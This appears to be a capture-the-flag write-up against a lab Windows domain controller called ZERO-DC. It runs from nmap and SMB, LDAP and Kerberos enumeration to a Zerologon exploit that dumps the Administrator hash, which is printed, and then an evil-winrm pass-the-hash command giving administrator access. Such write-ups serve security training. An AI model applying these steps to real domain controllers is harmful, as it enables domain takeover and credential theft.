# NMAP SCAN
```nmap
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-22 14:02:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ZERO
|   NetBIOS_Domain_Name: ZERO
|   NetBIOS_Computer_Name: ZERO-DC
|   DNS_Domain_Name: Zero.csl
|   DNS_Computer_Name: Zero-DC.Zero.csl
|   Product_Version: 10.0.17763
|_  System_Time: 2021-08-22T14:02:32+00:00
| ssl-cert: Subject: commonName=Zero-DC.Zero.csl
| Not valid before: 2021-08-21T13:58:55
|_Not valid after:  2022-02-20T13:58:55
|_ssl-date: 2021-08-22T14:03:12+00:00; -7h59m58s from scanner time.
Service Info: Host: ZERO-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -7h59m58s, deviation: 0s, median: -7h59m58s
|_nbstat: NetBIOS name: ZERO-DC, NetBIOS user: <unknown>, NetBIOS MAC: 0a:6f:97:e4:fd:4e (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-08-22T14:02:31
|_  start_date: N/A

```

# SMB
## Findings
- Anonymous login successful but no shares.

# LDAP
- Enumerate using python LDAP3
- If can't use automate from HackTricks
## Findings
- Nothing special except for domain names


# Kerberos
- We can enumerate users using kerbrute.
## Findings
`jared@Zero.csl 
administrator@Zero.csl`
-Both users doesn't have NPU, can't grab TGT

# Zerologon
- Since the box name is Zero, hinting towards ZeroLogon?
## Findings
- To test, we'll run the [exploit](https://github.com/bb00/zer0dump) on the box.
- The exploit will dump the Administrator's hash if it works.
```txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36242e2cb0b26d16fafd267f39ccf990:
```
- We can crack the hash, but we can just use `Pass The Hash` method to login using evil-winrm
```bash
$evil-winrm -i 172.31.1.29 -u administrator -H "36242e2cb0b26d16fafd267f39ccf990"
```
We are now administrator
